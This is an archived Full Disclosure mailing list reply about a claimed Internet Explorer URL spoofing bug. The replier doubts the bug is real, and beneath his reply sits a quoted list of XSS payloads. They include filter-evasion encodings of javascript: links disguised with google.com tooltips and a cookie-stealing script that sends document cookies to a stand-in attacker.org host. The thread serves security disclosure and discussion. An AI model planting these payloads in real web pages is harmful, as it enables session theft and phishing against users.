Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen).
From: Justin Allen <jallen () logicaldevelopments com au>
Date: Fri, 21 Oct 2005 09:08:43 +0800

Did you even test those URLs? The only thing that happens is a message
box pops up, the status bar text also states that a message box will pop
up. The only thing it does is change the tooltip on the link to google.com.

-- 
Justin Allen
Software Developer
Logical Developments
Phone: +61 8 9458 3889



Jerome Athias wrote:

You can then mix it with some classical XSS tricks like

Basic XSS test detected:

<a href="javascript:alert('XSS')" title="http://www.google.com";>hello0</a>
<a
href="http://www.target.com/foo<script>document.location='http://www.attacker.org/?&apos;
+document.cookies</script>">Click here</a>


Basic XSS test :

<a href="JaVaScRiPt:alert('XSS')" title="http://www.google.com";>hello0</a>

UTF-8:

<a
href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41"
title="http://www.google.com";>hello</a>

Long UTF-8 Unicode encoding without semicolons:

<a
href=&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041
title="http://www.google.com";
onMouseOver="pop('http://www.google.com&apos;);" onmouseout="kill()">hello</a>

Embedded newline to break up XSS:

<a href=jav&#x0A;ascript:alert('XSS'); title="http://www.google.com";
hover="http://www.google.com";>hello2</a>

Embedded carriage return to break up XSS (doesn't appear as link):

<a href=jav&#x0D;ascript:alert('XSS'); title="http://www.google.com";
onmouseover="image(this.href);">hello3</a>

Inserting spaces in href link:

<a href=" javascript:alert('XSS');" title="http://www.google.com";>hello4</a>


etc...

some bypass the Opera anti-illegal-urls

 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]